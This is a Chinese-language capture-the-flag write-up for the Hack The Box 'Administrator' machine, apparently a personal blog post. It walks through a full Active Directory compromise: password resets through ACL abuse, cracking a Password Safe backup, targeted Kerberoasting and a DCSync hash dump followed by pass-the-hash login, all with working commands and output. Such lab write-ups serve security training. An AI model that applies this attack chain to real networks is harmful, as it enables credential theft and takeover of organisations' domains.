htb-Administrator

内网攻防

s is common in real life Windows pentests, you will start the Administrator box with credentials for the following account: Username: Olivia Password: ichliebedich用户名:Olivia
密码:ichliebedich

nmap -sCV -A -T4 -Pn 10.10.11.42

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-14 15:42 CST
Nmap scan report for 10.10.11.42
Host is up (0.62s latency).
Not shown: 988 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-12-14 14:42:58Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=12/14%OT=21%CT=1%CU=42122%PV=Y%DS=2%DC=T%G=Y%TM=675
OS:D375F%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=108%TI=I%CI=RD%II=I%TS=
OS:A)SEQ(SP=107%GCD=1%ISR=108%TI=RD%CI=I%II=I%TS=A)SEQ(SP=107%GCD=1%ISR=108
OS:%TI=RD%CI=RD%II=I%TS=C)OPS(O1=M53ANW8ST11%O2=M53ANW8ST11%O3=M53ANW8NNT11
OS:%O4=M53ANW8ST11%O5=M53ANW8ST11%O6=M53AST11)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W
OS:4=FFFF%W5=FFFF%W6=FFDC)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M53ANW8NNS%CC=Y%Q=)T1(
OS:R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=
OS:%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W
OS:=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
OS:T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S
OS:+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUC
OS:K=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h00m04s
| smb2-time: 
|   date: 2024-12-14T14:44:08
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

TRACEROUTE (using port 23/tcp)
HOP RTT       ADDRESS
1   768.22 ms 10.10.16.1
2   359.07 ms 10.10.11.42

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 136.19 seconds

ftp尝试失败

smb爆破

SMB 是一种网络文件共享协议,允许应用程序通过网络读取和写入文件、请求远程服务以及进行其他网络操作。

利用提供的账号密码,使用CrackMapExec工具对SMB 服务进行枚举,验证提供的凭据是否可用,并查看是否存在有用的共享目录。

CrackMapExec 是一个常用的渗透测试工具,主要用于 Windows 网络的枚举和利用。它特别适合对 SMB、RDP 和 WinRM 服务进行广泛扫描、认证、执行命令和枚举共享目录等操作

结果显示,用户Olivia 的 SMB 登录有效,但未发现有用的共享目录,仅能读取常见的NETLOGONSYSVOL

crackmapexec smb 10.10.11.42 -u ‘Olivia’ -p ‘ichliebedich’ –shares

WinRM 登录olivia

WinRM 是 Microsoft 提供的远程管理协议,允许远程执行命令、启动进程、管理系统设置等,类似于 Unix 系统中的 SSH

使用 CrackMapExec 验证目标主机的WinRM 服务(端口 5985),发现凭据有效并成功登录。

返回结果表明可以通过 WinRM 获取远程访问权限

crackmapexec winrm 10.10.11.42 -u ‘Olivia’ -p ‘ichliebedich’

使用evil-winrm登录,使用evil-winrm 进一步获取目标主机的权限和用户信息

并且通过运行whoami /all 命令查看用户权限

evil-winrm -i 10.10.11.42 -u ‘Olivia’ -p ‘ichliebedich’

并且通过运行whoami /all 命令查看用户权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
┌──(root㉿kali)-[~]
└─# evil-winrm -i 10.10.11.42 -u 'Olivia' -p 'ichliebedich'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\olivia\Documents> whoami /all

USER INFORMATION
----------------

User Name            SID
==================== ============================================
administrator\olivia S-1-5-21-1088858960-373806567-254189436-1108


GROUP INFORMATION
-----------------

Group Name                                  Type             SID          Attributes
=========================================== ================ ============ ==================================================
Everyone                                    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\olivia\Documents>

结果发现Olivia 用户具有基本的操作权限,并且拥有SeMachineAccountPrivilege,允许其将计算机帐户添加到域中。

域用户爆破

成功登录目标主机后,使用net user 命令对域内的用户进行枚举。列出当前域控制器上存在的所有用户账户。

1
2
3
4
5
6
7
8
9
10
*Evil-WinRM* PS C:\Users\olivia\Documents> net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            alexander                benjamin
emily                    emma                     ethan
Guest                    krbtgt                   michael
olivia
The command completed with one or more errors.

olivia为当前使用的用户,其余为域内的其他用户

获取权限

BloodHound 提取域信息

使用工具bloodhound.py从域中提取信息

BloodHound工具链接:https://github.com/BloodHoundAD/BloodHound/releases

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌──(root㉿kali)-[~/BloodHound-linux-x64]
└─# bloodhound-python  -d administrator.htb -ns 10.10.11.42 -u 'Olivia' -p ichliebedich -c All --zip
INFO: Found AD domain: administrator.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: unpack requires a buffer of 4 bytes
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 11 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.administrator.htb
WARNING: DCE/RPC connection failed: [Errno Connection error (10.10.11.42:445)] timed out
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
INFO: Done in 01M 14S
INFO: Compressing output into 20241214163637_bloodhound.zip

运行此命令后,我们获得了压缩包20241214163637_bloodhound.zip,它包含了域中的所有关键信息。

接下来,我们使用sudo neo4j start命令启动数据库,并使用bloodhound命令进入工具。将得到的zip压缩包拖入到Bloodhound中上传文件。账号neo4j 密码123456

我们当前用户为Olivia,因此查看一下节点信息,左上角搜索Olivia,olivia有一个First Degreee object control(一级对象控制,接下来简称FDOC),点击它可以看到olivia对用户michael拥有GenericAll权限

横向移动

Olivia->michael

GenericAll 权限相当于“完全控制”权限,意味着 olivia 可以完全控制 michael 用户,包括修改密码和组成员等操作。

使用evil-winrm登录olivia用户,修改域内用户michael的密码为michael

1
2
*Evil-WinRM* PS C:\Users\olivia\Documents> net user michael michael /domain 
The command completed successfully.

成功登录,拿下michael用户

1
2
3
4
┌──(root㉿kali)-[/HTB/Administrator]
└─# evil-winrm -i 10.10.11.42 -u 'michael' -p 'michael'
*Evil-WinRM* PS C:\Users\michael\Documents> whoami
administrator\michael

michael->benjamin

ForceChangePassword

打开bloodhound,查看michael用户,发现该用户也有一个FDOC,并且该FDOC对benjamin用户具有ForceChangePassword权限,即可以强制更改benjamin的密码。

ftp登录benjamin

bloodhound中查看benjamin没有任何权限,但是他是share Moderator组的成员,可以尝试一下ftp连接

接下来使用ftp登录michael账户,

ftp

rpcclient

https://www.secrss.com/articles/48320

先修改密码

benjamin->emily
1
bloodyAD -u "michael" -p "michael" -d "Administrator.htb" --host "10.10.11.42" set password "benjamin" "12345678"
1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(root㉿kali)-[/HTB/Administrator]
└─# rpcclient -U michael 10.10.11.42
Password for [WORKGROUP\michael]:
rpcclient $> setuserinfo2 benjamin 23 'benjamin'
rpcclient $> exit

┌──(root㉿kali)-[~/BloodHound-linux-x64]
└─# ftp benjamin@10.10.11.42
Connected to 10.10.11.42.
220 Microsoft FTP Service
331 Password required
Password: 
230 User logged in.
Remote system type is Windows_NT.

ftp登录之后,查看一下当前目录下的文件,发现一个备份文件Backup.psafe3,将它下载下来

1
2
3
4
5
6
7
8
9
10
ftp> dir
ftp> binary  #切换成二进制模式传输文件
200 Type set to I.
ftp> get Backup.psafe3
local: Backup.psafe3 remote: Backup.psafe3
229 Entering Extended Passive Mode (|||51246|)
125 Data connection already open; Transfer starting.
100% |**********************************************************************************************|   952        0.77 KiB/s    00:00 ETA
226 Transfer complete.
952 bytes received in 00:01 (0.77 KiB/s)

在哪打开终端就会下到哪个目录下

psafe3 文件是加密的密码安全文件

无法直接读取,需要使用 pwsafe2john 工具进行获取 hash,卡 kali 自带有

1
2
3
┌──(root㉿kali)-[/home/kali/Administrator]
└─# pwsafe2john Backup.psafe3  
Backu:$pwsafe$*3*4ff588b74906263ad2abba592aba35d58bcd3a57e307bf79c8479dec6b3149aa*2048*1a941c10167252410ae04b7b43753aaedb4ec63e3f18c646bb084ec4f0944050

拿到 hash,尝试进行解密

1
2
3
4
5
6
7
8
9
10
11
┌──(root㉿kali)-[/home/kali/Administrator]
└─# john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (pwsafe, Password Safe [SHA256 128/128 AVX 4x])
Cost 1 (iteration count) is 2048 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tekieromucho     (Backu)     
1g 0:00:00:00 DONE (2024-12-05 23:24) 4.761g/s 29257p/s 29257c/s 29257C/s newzealand..iheartyou
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

用本机的软件

1
2
3
alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb
emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur

得到emily的密码为:UXLCI5iETUsIBoFVTj8yQFKoHjXmb

使用evil-winrm登录emily用户

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[/HTB/Administrator]
└─# evil-winrm -i 10.10.11.42 -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily\Documents> whoami
administrator\emily

成功拿下emily权限,进入桌面目录,拿下第一个flag

1
2
3
4
5
6
7
8
9
10
11
12
13
*Evil-WinRM* PS C:\Users\emily\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\emily\Desktop> dir

    Directory: C:\Users\emily\Desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        10/30/2024   2:23 PM           2308 Microsoft Edge.lnk
-ar---         12/7/2024  12:20 AM             34 user.txt


*Evil-WinRM* PS C:\Users\emily\Desktop> cat user.txt
888ac3b3d60b08fa502ca90c9e90d506
emily->ethan

再次查看bloodhoundemily有一个FDOC,对用户ethan拥有GenericWrite权限。

在 Active Directory (AD) 环境中,GenericWrite 是一种权限,允许攻击者对目标账户的属性进行修改。

这里介绍一下Kerberoasting攻击

Kerberos 协议在处理身份验证时,允许域内用户为拥有 SPN(Service Principal Name,标识服务实例的唯一名称) 的账户请求服务票据。

这些票据通常是由账户的 NTLM 哈希加密生成的,只要域账户注册了SPN,攻击者就可以使用Kerberos请求服务票据并提取票据。因此攻击者可以通过离线破解服务票据(例如使用工具 PowerViewGetUserSPNs.py)间接得到目标账户的密码。

但是这里我们没有看到ethan用户注册SPN,因此我们只能通过GenericWriteethan用户创建一个SPN,然后请求一个票据并使用targetedKerberoast.py破解它。

targetedKerberoast.py下载链接:https://github.com/ShutdownRepo/targetedKerberoast

先更新一下时间,不然会有时差,导致破解失败

1
2
3
4
5
6
7
8
┌──(root㉿kali)-[~/Desktop]
└─# ntpdig 10.10.11.42
2024-12-15 02:22:47.084508 (+0800) +25206.101334 +/- 0.209603 10.10.11.42 s1 no-leap
                                                                                                                                                           
┌──(root㉿kali)-[~/Desktop]
└─# ntpdate 10.10.11.42
2024-12-15 02:23:04.429985 (+0800) +25206.072243 +/- 0.240176 10.10.11.42 s1 no-leap
CLOCK: time stepped by 25206.072243

创建SPN

Set-ADUser -Identity ethan -ServicePrincipalNames @{ADD=”opsSPN/host”}

破解

1
2
3
4
5
6
┌──(root㉿kali)-[~/targetedKerberoast-main]
└─# python targetedKerberoast.py -u "emily" -p "UXLCI5iETUsIBoFVTj8yQFKoHjXmb" -d "Administrator.htb" --dc-ip 10.10.11.42
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$Administrator.htb/ethan*$c272d2d4f6c0ecab1c52f9c3a61a7752$80ac44b67f02b88210f31a575ec0c3e8ef7a74fa05eea49a2afe46ae6a8085a0c8fc51ab9f1d0ae4849aae9dd2880b46a2cf1f7a1c9b2ba5639cb58c0f7e4e2b5474cda1e70fae234f89807cc8d2b7972079899077da12b0a662439fd592504c4d942759de88d5b8f93ee57f3306444ceba8b69c934d9ad5de4d98fe198b63fcda638a2b2dde3b246b7e34974e600c843c44ed41034ada89298d3081ba78d23aca4adad45aa123840df2de7ddab67f0138ca0c96dc712a927e5dbc2123709f7c5873f025912727e2212671ad3f5f37a10e6fd65cf93ac77d514acd615f105f977eb6afb1ab3917415f0a86f21137569fa23131d295be7478e34c29048fadf4875a2029e89d7c10f743e589521982eb9928beb8df8b1273c44eac940910aea9fbb046900897eac2476d33874ce71713016a7f879fcdedcdacdcc1d079fceb0235d909e77416760aa14918853bca87d9801ea1364bb8bfa9b9ff8bdfaae3a227d214832c8c8c787ea304e0aaa43828428b5f976569b8aa809adbdecc775f2edb41b2276b895ccc189675eae246123f5e903bb6cf5c35f641a244698a405999faae73096ad9bbee2e9d5427e2ac169350d5172578482327a326708d019348520750a144a90f7684aa4a2557ede1bb4ba25a6a2ed9bfc24acee897e8cd52db8e10232518e8201dc5b39317ea892ae6b4db81a1e75c70bf99b8b3d8b83a35bd664a8e387e1ae092844dc62420c418b9b3790071908d9131b79e242bfd33489318278460ed861ce63b3c51a3cf7f4b6122083db3e30dcd9a4e088ddda78d9bf337d0e1ede8192e0aa6ddc436a658f8ab92c4a7c4684352dd873159cbb830d703f46b7f2f86d63f5f512867a3298df24f7ffa7276865fc5e8affa0944b44e7691482e66934b8f32cbe4b6033a1145164b2c12dbc1f6ccec70076b61dc21f40f7f9b22f3daf6cacab4073dd5365f617255df7fb89b948e41c12fdd251508ed2c537a268595a10f012b5ca1b783dbdc238b375b215404dee90122627e1cbd8982fcc34fef8f0c0073f4391aff527e5be543ce4678bdc22b8bd1a7373b017680060552ea8a2f703a9fdfaf4f81370f9b5d3c21d2f50e3975c2246965047642679258a429adcf05ec61dfb6852148b53cdb741e752d0d716625956c4504e99a915bdb27cba9970e6ae8f5af1249fef2a3c8c935daae78e1413378894c4f18429b7cee5fdb3e9dabd30155253e0efe850f47baea504f3b74247617d62de7a482ad245b1d5d43fdbf2ddabc18e7da4a381cdf51f9d2d6d2c953bbfd73e57af2e59dcec4194cf03cf8ca8e8098319c2941069d0b11fab87292e0ef94aad811b662c541d25dcb629b1466d4133cfec0e5f9c21180cc74e80170707fd45cff021430187b4cfcdc5120f568567ad80f8a705446cb355ed2d49af31fe8825e65e5dcdc659fd78d4856f89a8ea2179fd30b9c802d3a16b378c6ab39c738de3d454b2649f2e6a33f7fdec9c866ca59f3fc50924aa5a21e7a4a4852cd159aca2c03d0f100b355a21ee9

解密

1
2
3
4
5
6
7
8
9
10
┌──(root㉿kali)-[/home/kali/Administrator]
└─# john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
limpbizkit       (?)     
1g 0:00:00:00 DONE (2024-12-06 17:35) 100.0g/s 512000p/s 512000c/s 512000C/s newzealand..babygrl
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

得到 Ethan 的密码:limpbizkit

Ethan->Administrator

现在我们已经获取了ethan 的密码,使用 BloodHound 检查他的权限。发现ethan 的 FDOC权限间接赋予了他在域控制器 (Domain Controller, DC) 上的DCSync权限。

DCSync 是一种滥用 Active Directory (AD) 复制机制的攻击技术。拥有 DCSync 权限的用户可以模拟域控制器,向其他 DC 请求复制敏感数据,如 NTLM 哈希和 Kerberos 密钥。

借助DCSync,使用impacket-secretsdump转储域控制器上的所有密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
┌──(root㉿kali)-[~/BloodHound-linux-x64]
└─# impacket-secretsdump ethan:limpbizkit@10.10.11.42
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:e55bcd70f1b548fc4304ebd8a3f2f2f7:::
administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:259745cb123a52aa2e693aaacca2db52:::
administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664
Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2
Administrator:des-cbc-md5:403286f7cdf18385
krbtgt:aes256-cts-hmac-sha1-96:920ce354811a517c703a217ddca0175411d4a3c0880c359b2fdc1a494fb13648
krbtgt:aes128-cts-hmac-sha1-96:aadb89e07c87bcaf9c540940fab4af94
krbtgt:des-cbc-md5:2c0bc7d0250dbfc7
administrator.htb\olivia:aes256-cts-hmac-sha1-96:713f215fa5cc408ee5ba000e178f9d8ac220d68d294b077cb03aecc5f4c4e4f3
administrator.htb\olivia:aes128-cts-hmac-sha1-96:3d15ec169119d785a0ca2997f5d2aa48
administrator.htb\olivia:des-cbc-md5:bc2a4a7929c198e9
administrator.htb\michael:aes256-cts-hmac-sha1-96:dec0f5eac8b174633aa1449c41abdd0170098d31f2c38242675c6ad80873a229
administrator.htb\michael:aes128-cts-hmac-sha1-96:4d614f91ce0d82e332d76139b19ec03b
administrator.htb\michael:des-cbc-md5:49f10d5d97f19d5d
administrator.htb\benjamin:aes256-cts-hmac-sha1-96:e110f75337181474608f51a5b22d8198d3fa56d68633b384b7136d4496c89337
administrator.htb\benjamin:aes128-cts-hmac-sha1-96:aa2b24ac2fb879262faa4f6ca294f332
administrator.htb\benjamin:des-cbc-md5:1a4f0bce2343cebf
administrator.htb\emily:aes256-cts-hmac-sha1-96:53063129cd0e59d79b83025fbb4cf89b975a961f996c26cdedc8c6991e92b7c4
administrator.htb\emily:aes128-cts-hmac-sha1-96:fb2a594e5ff3a289fac7a27bbb328218
administrator.htb\emily:des-cbc-md5:804343fb6e0dbc51
administrator.htb\ethan:aes256-cts-hmac-sha1-96:e8577755add681a799a8f9fbcddecc4c3a3296329512bdae2454b6641bd3270f
administrator.htb\ethan:aes128-cts-hmac-sha1-96:e67d5744a884d8b137040d9ec3c6b49f
administrator.htb\ethan:des-cbc-md5:58387aef9d6754fb
administrator.htb\alexander:aes256-cts-hmac-sha1-96:b78d0aa466f36903311913f9caa7ef9cff55a2d9f450325b2fb390fbebdb50b6
administrator.htb\alexander:aes128-cts-hmac-sha1-96:ac291386e48626f32ecfb87871cdeade
administrator.htb\alexander:des-cbc-md5:49ba9dcb6d07d0bf
administrator.htb\emma:aes256-cts-hmac-sha1-96:951a211a757b8ea8f566e5f3a7b42122727d014cb13777c7784a7d605a89ff82
administrator.htb\emma:aes128-cts-hmac-sha1-96:aa24ed627234fb9c520240ceef84cd5e
administrator.htb\emma:des-cbc-md5:3249fba89813ef5d
DC$:aes256-cts-hmac-sha1-96:98ef91c128122134296e67e713b233697cd313ae864b1f26ac1b8bc4ec1b4ccb
DC$:aes128-cts-hmac-sha1-96:7068a4761df2f6c760ad9018c8bd206d
DC$:des-cbc-md5:f483547c4325492a
[*] Cleaning up...

现在已经拥有了Administrator的哈希值,使用evil-winrm登录

1
2
3
4
┌──(root㉿kali)-[/home/kali/Desktop/secretsdump.py-main]
└─# evil-winrm -i 10.10.11.42 -u Administrator -H 3dc553ce4b9fd20bd016e098d2d2fd2e
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
administrator\administrator

成功登录administrator用户,切换到桌面目录,发现root.txt,拿下第二个flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir


    Directory: C:\Users\Administrator\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---        12/13/2024  11:45 PM             34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
c453aa7121957348d4d4f383383f48fe

恢复时间

https://www.bdpnt.com/kepu/2667.html